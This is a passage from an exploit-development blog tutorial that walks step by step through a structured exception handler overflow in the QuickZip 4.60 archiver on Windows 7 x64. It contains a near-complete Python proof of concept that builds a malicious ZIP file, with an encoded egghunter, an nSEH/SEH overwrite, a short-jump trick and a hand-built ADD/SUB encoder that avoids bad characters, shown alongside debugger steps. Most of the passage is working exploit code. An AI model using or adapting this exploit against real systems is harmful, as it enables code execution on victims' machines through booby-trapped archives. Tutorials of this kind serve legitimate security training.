</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">exploit</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Exploit complete!&quot;</span>
</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s trigger the crash, pass execution to the program and execute <em>POP-POP-RET</em> instructions. After this, scroll up in the CPU window and try to find end of egghunter payload and long set of <code>INC ECX</code> instructions (representing A characters).</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/16%20found%20egghunter.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/16%20found%20egghunter.png" alt="image" /></a></p>

<p>Great, looks like it&rsquo;s there and it appears to be correct as well - no bad characters were used!</p>

<h2>Jumping back</h2>

<p>Now, we have few more things to look after - the most important thing to remember here is that we need to put address of where the egghunter begins into the EAX and jump to it.</p>

<p>How can we do it having a limited space? Well, first of all - how much space do we have? Quick maths tells us that it&rsquo;s <strong>146</strong> bytes (nseh offset minus the size of egghunter).</p>

<p>What can we do with 146 bytes? We only need to write few instructions, but they need to adhere to the limited character set we&rsquo;re allowed to use. In this case, we cannot use a generic encoder that we already used for egghunter as we simply don&rsquo;t have enough space to fit it in.</p>

<p>This leaves us with one option - we&rsquo;ll need to create our own encoder! It sounds scary and complicated, but it&rsquo;s actually a lot simpler than it seems.</p>

<p>But first, let&rsquo;s see where we are in the program currently.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/12.after%20pop%20pop%20ret.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/12.after%20pop%20pop%20ret.png" alt="image" /></a></p>

<p>So we only have <strong>4</strong> bytes at our disposal to jump back to the payload and start writing our custom encoder. Also, those 4 bytes would need to be, preferably, alphanumeric. Thankfully, there are few instructions we can use, specifically in situations like those!</p>

<p>Credit given where credit&rsquo;s due - thanks to <a href="https://twitter.com/TheColonial">TheColonial</a> for sharing this very useful trick: <a href="http://buffered.io/posts/jumping-with-bad-chars/">http://buffered.io/posts/jumping-with-bad-chars/</a>.</p>

<p>In short, we can simply use <code>JO</code> and <code>JNO</code> instructions to invoke short jumps back into our payload. But how far can we jump? After some playing around with allowed characters I found that some of the bad characters are converted to <code>A2</code>, which translates to 92 in decimal&hellip; which should give us just enough space to allow us to create our custom encoder.</p>

<p>Let&rsquo;s generate the required OPCODES with <code>metasm</code> and add them in our payload in place of nSEH.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>metasm &gt; jno $-99
</span><span class='line'>"\x71\x9b"
</span><span class='line'>metasm &gt; jo $-99
</span><span class='line'>"\x70\x9b"</span></code></pre></td></tr></table></div></figure>


<p><em>Note:</em> <code>\x9b</code> (-99), since it&rsquo;s a bad character, will actually be converted into <code>\xa2</code> (-92).</p>

<p>The portion of our PoC should now look like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="n">payload</span> <span class="o">=</span> <span class="n">egghunter</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>   <span class="c"># padding for nSEH</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x71\x9b\x70\x9b</span><span class="s">&quot;</span>                   <span class="c"># nSEH: jno $-99; jo $-99 ==&gt; 9b will actually be converted to A2, which is $-92</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x33\x28\x42\x00</span><span class="s">&quot;</span>                   <span class="c"># SEH</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="n">pattern</span>                              <span class="c"># pattern to look for in memory</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;.txt&quot;</span>
</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s trigger the crash, pass execution to the program, step through the <em>POP-POP-RET</em> instructions and observe what happens when we step through the <code>JNO</code>/<code>JO</code> instructions.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/17.jno%20jump%20taken.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/17.jno%20jump%20taken.png" alt="image" /></a></p>

<p>Awesome, the jump is taken and we land in our payload! Let&rsquo;s now create our custom encoder to write instructions to jump to the egg hunting routine.</p>

<h2>Custom encoder</h2>

<p>We need to write several instructions to be able to jump to our egghunter, however, there is no way to write them directly without using bad characters.</p>

<p>To get around it we&rsquo;ll need to do the following:</p>

<ol>
<li>Find out what are the opcodes of instructions we want to write</li>
<li>Using simple, mathematical instructions (namely <code>ADD</code> and <code>SUB</code>) we&rsquo;ll place values of the opcodes from step above into a register of our choice (e.g. <code>EAX</code>) using only allowed characters</li>
<li>We&rsquo;ll write value of this register onto the stack, effectively writing the instructions we want to the area pointed to by <code>ESP</code></li>
</ol>


<p>Sounds complicated? It&rsquo;s actually not that bad and it makes a lot more sense once you start playing with it.</p>

<p>First of all, we need to adjust the stack to be able to write to the area of memory we control. Looking at the values of <code>ESP</code> and where we currently are (screenshot above), we need to offset the <code>ESP</code> by <code>0x62C</code> (<code>0x0018FB58</code> (value of <code>EIP</code>) minus <code>0x0018F528</code> (value of <code>ESP</code>) minus <code>0x4</code> (empty bytes for padding)).</p>

<p>This can be achieved using the following instructions:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>push esp;
</span><span class='line'>pop eax;
</span><span class='line'>add eax, 0x62C;
</span><span class='line'>push eax;
</span><span class='line'>pop esp;</span></code></pre></td></tr></table></div></figure>


<p>Corresponding OPCODES of above instructions are as follows:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>"\x54"                  # push esp;
</span><span class='line'>"\x58"                  # pop eax;
</span><span class='line'>"\x05\x2c\x06\x00\x00"  # add eax, 0x62C
</span><span class='line'>"\x50"                  # push eax;
</span><span class='line'>"\x5c"                  # pop esp;</span></code></pre></td></tr></table></div></figure>


<p>However, we have a problem - &ldquo;\x05\x2c\x06\x00\x00&rdquo; has two <code>NULL</code> bytes, which would break our exploit.</p>

<p>However, we can easily fix it up by performing number of <code>ADD</code> and <code>SUB</code> instructions using valid characters to set the value we want, e.g.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>\x05\x2d\x07\x01\x01    # add eax, 0x0101072D
</span><span class='line'>\x2d\x01\x01\x01\x01    # sub eax, 0x01010101
</span><span class='line'>                        # total:   0x00000630</span></code></pre></td></tr></table></div></figure>


<p>Voilà! We were able to achieve the same thing using valid characters. Let&rsquo;s update the exploit and see what happens.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/18.stack%20adjusted.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/18.stack%20adjusted.png" alt="image" /></a></p>

<p>Great, our payload does exactly what we need leaving us with adjusted stack, ready to start writing our encoder.</p>

<p><em>Note:</em> because of the <code>pop esp</code> instruction (<code>\x5c</code>), contents of our ZIP file look a little bit different. The <code>\x5c</code> represents a backslash, which is interpreted by QuickZip as a folder&hellip; this may have some implications later, but that&rsquo;s OK for now.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/19.quickzip%20folder.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/19.quickzip%20folder.png" alt="image" /></a></p>

<p>Now, the last thing we need to do is to write a set of instructions that put a start address of the egghunter into EAX and jump to it.</p>

<p>In order to avoid bad characters, we&rsquo;ll set the values of opcodes we need in the <code>EAX</code> register and push it on the stack that we have adjusted. This way, the instructions we need will be written in the area we control.</p>

<p>It&rsquo;s probably best explained using an example.</p>

<p>Let&rsquo;s start off with what instructions do we actually want to write? The following will do exactly what we need:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>push esp;
</span><span class='line'>pop eax;
</span><span class='line'>sub eax, 0xDEADBEEF
</span><span class='line'>jmp eax;</span></code></pre></td></tr></table></div></figure>


<p>Pretty simple - push <code>ESP</code> on the stack, pop it into EAX, adjust it by a certain value to land in the egghunter (we don&rsquo;t know the exact value, hence the placeholder <code>0xDEADBEEF</code> for now) and jump to the adjusted address from <code>EAX</code>.</p>

<p>Let&rsquo;s generate the bytes we need:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>metasm &gt; push esp
</span><span class='line'>"\x54"
</span><span class='line'>metasm &gt; pop eax
</span><span class='line'>"\x58"
</span><span class='line'>metasm &gt; sub eax, 0xDEADBEEF
</span><span class='line'>"\x2d\xef\xbe\xad\xde"
</span><span class='line'>metasm &gt; jmp eax
</span><span class='line'>"\xff\xe0"</span></code></pre></td></tr></table></div></figure>


<p>And write them in groups of 4:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>\x54\x58\x2d\xef
</span><span class='line'>\xbe\xad\xde\xff
</span><span class='line'>\xe0\x90\x90\x90</span></code></pre></td></tr></table></div></figure>


<p>Since we&rsquo;ll be writing 4 bytes at a time, we needed to pad it out with 3 nops (<code>\x90</code>) at the end (to put the total length of bytes to write to 12).</p>

<p>Now, let&rsquo;s write the bytes starting from bottom-right (because <a href="https://en.wikipedia.org/wiki/Endianness">endianness</a>) - this will indicate the values that we actually need to push onto the stack.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>\x90\x90\x90\xe0
</span><span class='line'>\xff\xde\xad\xbe
</span><span class='line'>\xef\x2d\x58\x54</span></code></pre></td></tr></table></div></figure>


<p>Remembering that we can only use ASCII values, that means that we should be able to use pretty much any combination of bytes from <code>01</code> to <code>7f</code> for our calculations.</p>

<p>Let&rsquo;s come up with an exploit friendly instructions to write first set of bytes into eax:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'>                        <span class="c"># zero out EAX</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>  <span class="c"># and eax,0x10101010</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>  <span class="c"># and eax,0x01010101</span>
</span><span class='line'>                           <span class="c"># write 0x909090e0 into EAX</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x05\x70\x70\x70\x70</span><span class="s">&quot;</span>  <span class="c"># add eax, 0x70707070</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x05\x70\x20\x20\x20</span><span class="s">&quot;</span>  <span class="c"># add eax, 0x20202070</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                  <span class="c"># push eax;</span>
</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s update the exploit code and run it.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/20.writing%20bytes%201.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/20.writing%20bytes%201.png" alt="image" /></a></p>

<p>Fantastic, we have successfully set the value we need in the EAX and pushed it onto the stack, what has actually written the instructions we need!</p>

<p>Let&rsquo;s do the same for all remaining bytes.</p>

<p>After all that maths, the updated PoC should look as follows:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_1</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_2</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x24\x00\x00\x00\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_3</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Building PoC..&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">4064</span>
</span><span class='line'><span class="n">nseh_offset</span> <span class="o">=</span> <span class="mi">292</span>
</span><span class='line'><span class="n">jump_offset</span> <span class="o">=</span> <span class="mi">92</span>
</span><span class='line'>
</span><span class='line'><span class="c"># msfencode -e x86/alpha_mixed bufferregister=eax -i egghunter-wow64.bin</span>
</span><span class='line'><span class="c"># [*] x86/alpha_mixed succeeded with size 146 (iteration=1)</span>
</span><span class='line'><span class="n">egghunter</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x66\x51\x49\x4b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x52\x73\x53\x63\x62\x73\x36\x33\x4e\x53\x6f\x30\x75\x36</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x6d\x51\x59\x5a\x49\x6f\x36\x6f\x72\x62\x71\x42\x42\x4a</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x66\x46\x56\x38\x74\x73\x78\x49\x4c\x4b\x4b\x64\x61\x74</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x6f\x47\x63\x31\x4e\x50\x5a\x77\x4c\x77\x75\x53\x44</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x79\x38\x38\x52\x57\x36\x50\x50\x30\x33\x44\x6c\x4b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x59\x6a\x4e\x4f\x32\x55\x38\x64\x4e\x4f\x70\x75\x6b\x51</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x6b\x4f\x79\x77\x41\x41</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">=</span> <span class="n">egghunter</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="o">-</span> <span class="n">jump_offset</span><span class="p">)</span>   <span class="c"># padding for nSEH</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Offset the stack by 0x62C to start writing to a controlled area of memory</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x54</span><span class="s">&quot;</span>                   <span class="c"># push esp;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x58</span><span class="s">&quot;</span>                   <span class="c"># pop eax;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x2d\x07\x01\x01</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x0101072D</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2d\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># sub eax, 0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x5c</span><span class="s">&quot;</span>                   <span class="c"># pop esp;</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Write instructions for: push esp; pop eax; sub eax, 0xDEADBEEF; jmp eax</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0x909090e0 into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x70\x70\x70\x70</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x70707070</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x70\x20\x20\x20</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x20202070</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xffdeadbe into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x77\x77\x77\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77777777</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x37\x25\x57\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77572537</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x10\x11\x10\x11</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x11101110</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xef2d5854 into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x43\x47\x1c\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x771c4743</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x10\x10\x01\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77011010</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x01\x01\x10\x01</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x01100101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>   <span class="c"># padding for the rest of encoder</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x71\x9b\x70\x9b</span><span class="s">&quot;</span>   <span class="c"># nSEH: jno $-99; jo $-99   =&gt; &#39;9b&#39; will actually be converted to &#39;a2&#39;, which is $-92</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x33\x28\x42\x00</span><span class="s">&quot;</span>   <span class="c"># SEH</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1